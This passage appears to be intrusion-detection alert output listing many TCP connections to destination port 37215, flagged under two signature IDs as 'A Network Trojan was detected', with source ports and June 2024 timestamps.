                SID:2835222
                Source Port:56398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682714
                SID:2835222
                Source Port:50308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776875
                SID:2835222
                Source Port:34128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618280
                SID:2829579
                Source Port:37770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.385013
                SID:2835222
                Source Port:36904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033274
                SID:2835222
                Source Port:45296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274333
                SID:2835222
                Source Port:48816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471148
                SID:2829579
                Source Port:50440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645230
                SID:2829579
                Source Port:56378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718647
                SID:2835222
                Source Port:60260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792157
                SID:2829579
                Source Port:34582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715885
                SID:2829579
                Source Port:52380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133932
                SID:2829579
                Source Port:38782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942302
                SID:2835222
                Source Port:35944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184115
                SID:2835222
                Source Port:37974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032642
                SID:2829579
                Source Port:59926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828531
                SID:2835222
                Source Port:42488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878706
                SID:2829579
                Source Port:35590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906063
                SID:2829579
                Source Port:55576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367914
                SID:2835222
                Source Port:33498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803302
                SID:2835222
                Source Port:39504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803270
                SID:2829579
                Source Port:46430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977416
                SID:2835222
                Source Port:35688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453478
                SID:2835222
                Source Port:57346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614303
                SID:2835222
                Source Port:51412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724192
                SID:2835222
                Source Port:49290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051405
                SID:2829579
                Source Port:39564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860099
                SID:2829579
                Source Port:50164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942761
                SID:2829579
                Source Port:51424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134497
                SID:2829579
                Source Port:56848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366931
                SID:2835222
                Source Port:54804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762600
                SID:2829579
                Source Port:46870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230262
                SID:2829579
                Source Port:51888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663735
                SID:2829579
                Source Port:54158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729152
                SID:2835222
                Source Port:54164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.992430
                SID:2835222
                Source Port:38976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941675
                SID:2835222
                Source Port:46370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.078504
                SID:2829579
                Source Port:41312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226886
                SID:2829579
                Source Port:40108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967532
                SID:2829579
                Source Port:34724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034769
                SID:2835222
                Source Port:41090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716930
                SID:2835222
                Source Port:60042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944359
                SID:2829579
                Source Port:53060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979135
                SID:2835222
                Source Port:33206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761325
                SID:2829579
                Source Port:39310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679090
                SID:2829579
                Source Port:35428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422241
                SID:2835222
                Source Port:42894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806635
                SID:2835222
                Source Port:47208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410627
                SID:2835222
                Source Port:52874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676115
                SID:2835222
                Source Port:54480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733378
                SID:2835222
                Source Port:39636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202482
                SID:2835222
                Source Port:48744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.987936
                SID:2835222
                Source Port:49328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944576
                SID:2835222
                Source Port:44946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292162
                SID:2829579
                Source Port:35742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470007
                SID:2835222
                Source Port:49748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182386
                SID:2829579
                Source Port:51496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830840
                SID:2835222
                Source Port:36502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880805
                SID:2829579
                Source Port:33310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676161
                SID:2829579
                Source Port:46750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759656
                SID:2835222
                Source Port:59618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831545
                SID:2829579
                Source Port:57154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676820
                SID:2829579
                Source Port:35458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183260
                SID:2829579
                Source Port:51350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087200
                SID:2829579
                Source Port:33502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661855
                SID:2829579
                Source Port:45438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967660
                SID:2829579
                Source Port:39532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565968
                SID:2829579
                Source Port:55216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470962
                SID:2835222
                Source Port:48342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617344
                SID:2829579
                Source Port:50352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449309
                SID:2829579
                Source Port:48018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290573
                SID:2829579
                Source Port:39146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913659
                SID:2835222
                Source Port:38624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277551
                SID:2835222
                Source Port:60130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053852
                SID:2829579
                Source Port:58064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705099
                SID:2835222
                Source Port:42082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617779
                SID:2835222
                Source Port:36086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977647
                SID:2835222
                Source Port:32858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978725
                SID:2829579
                Source Port:60776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701029
                SID:2829579
                Source Port:50946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134521
                SID:2829579
                Source Port:59890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811361
                SID:2835222
                Source Port:38440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625266
                SID:2835222
                Source Port:34196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.714950
                SID:2835222
                Source Port:53148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503406
                SID:2835222
                Source Port:55760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054344
                SID:2829579
                Source Port:37886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022302
                SID:2835222
                Source Port:57448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146231
                SID:2829579
                Source Port:60254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934237
                SID:2829579
                Source Port:56698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.569363
                SID:2829579
                Source Port:42826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726481
                SID:2829579
                Source Port:54706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.046063
                SID:2829579
                Source Port:45074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943085
                SID:2835222
                Source Port:49128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999297
                SID:2835222
                Source Port:48030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277067
                SID:2835222
                Source Port:36412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986350
                SID:2829579
                Source Port:51618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805690
                SID:2835222
                Source Port:43446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765097
                SID:2829579
                Source Port:36794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914076
                SID:2835222
                Source Port:49058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014321
                SID:2835222
                Source Port:41200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014085
                SID:2829579
                Source Port:56002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718368
                SID:2829579
                Source Port:48378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792539
                SID:2829579
                Source Port:34622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083657
                SID:2835222
                Source Port:44604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033695
                SID:2829579
                Source Port:56832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453374
                SID:2835222
                Source Port:38212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012593
                SID:2829579
                Source Port:38478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072286
                SID:2835222
                Source Port:54830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293145
                SID:2835222
                Source Port:35508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470061
                SID:2829579
                Source Port:44682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762320
                SID:2829579
                Source Port:34022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200819
                SID:2829579
                Source Port:58822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762373
                SID:2835222
                Source Port:42068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681769
                SID:2835222
                Source Port:57844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412277
                SID:2835222
                Source Port:59648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565436
                SID:2835222
                Source Port:38190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472372
                SID:2835222
                Source Port:48320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944602
                SID:2835222
                Source Port:37594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761506
                SID:2835222
                Source Port:44332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762143
                SID:2829579
                Source Port:51544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762621
                SID:2829579
                Source Port:41610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115463
                SID:2835222
                Source Port:54704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762814
                SID:2829579
                Source Port:36168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971616
                SID:2829579
                Source Port:51914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944441
                SID:2829579
                Source Port:42594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230841
                SID:2835222
                Source Port:53006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789741
                SID:2829579
                Source Port:57194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564573
                SID:2835222
                Source Port:60310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789851
                SID:2829579
                Source Port:46120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.905018
                SID:2835222
                Source Port:37434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012569
                SID:2835222
                Source Port:59414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149063
                SID:2835222
                Source Port:42188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.161512
                SID:2835222
                Source Port:56034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115251
                SID:2829579
                Source Port:40054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074879
                SID:2835222
                Source Port:56010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383328
                SID:2835222
                Source Port:54294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878578
                SID:2829579
                Source Port:48460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662346
                SID:2829579
                Source Port:41208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969296
                SID:2829579
                Source Port:53584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671648
                SID:2829579
                Source Port:43228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991720
                SID:2835222
                Source Port:57110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012430
                SID:2835222
                Source Port:50538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882131
                SID:2829579
                Source Port:60222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545944
                SID:2835222
                Source Port:54832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245569
                SID:2835222
                Source Port:48650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028594
                SID:2835222
                Source Port:38434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943730
                SID:2835222
                Source Port:57222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225534
                SID:2835222
                Source Port:55954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186506
                SID:2829579
                Source Port:46520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365096
                SID:2835222
                Source Port:57828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165227
                SID:2835222
                Source Port:33702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021690
                SID:2835222
                Source Port:54464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980464
                SID:2829579
                Source Port:54634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677276
                SID:2829579
                Source Port:35664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020900
                SID:2829579
                Source Port:48604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544404
                SID:2835222
                Source Port:46760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792475
                SID:2835222
                Source Port:41914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804668
                SID:2829579
                Source Port:41778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790792
                SID:2835222
                Source Port:33662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546904
                SID:2829579
                Source Port:46082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.673161
                SID:2835222
                Source Port:44144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663034
                SID:2829579
                Source Port:42604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503957
                SID:2835222
                Source Port:37458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941620
                SID:2829579
                Source Port:58688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672329
                SID:2829579
                Source Port:49326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790611
                SID:2835222
                Source Port:55906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878032
                SID:2835222
                Source Port:34278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381126
                SID:2829579
                Source Port:34274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518534
                SID:2835222
                Source Port:46508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011762
                SID:2829579
                Source Port:35610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423405
                SID:2835222
                Source Port:44898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229845
                SID:2835222
                Source Port:49110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978584
                SID:2835222
                Source Port:35808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831635
                SID:2835222
                Source Port:55974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766014
                SID:2829579
                Source Port:39288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111857
                SID:2829579
                Source Port:58144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.288660
                SID:2829579
                Source Port:49534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813478
                SID:2829579
                Source Port:54008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149329
                SID:2835222
                Source Port:57878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342052
                SID:2829579
                Source Port:47552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.070755
                SID:2829579
                Source Port:57082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704189
                SID:2835222
                Source Port:60006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732616
                SID:2829579
                Source Port:33966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022972
                SID:2835222
                Source Port:38584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111642
                SID:2829579
                Source Port:54842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548471
                SID:2829579
                Source Port:54238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228702
                SID:2829579
                Source Port:47054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718560
                SID:2835222
                Source Port:60852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501600
                SID:2829579
                Source Port:39856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806672
                SID:2835222
                Source Port:34662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010924
                SID:2835222
                Source Port:47402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.086865
                SID:2829579
                Source Port:45622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811669
                SID:2829579
                Source Port:50040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242473
                SID:2829579
                Source Port:50724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618453
                SID:2829579
                Source Port:47488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661427
                SID:2829579
                Source Port:35988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882169
                SID:2829579
                Source Port:53044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202426
                SID:2829579
                Source Port:42642
                Destination Port:37215
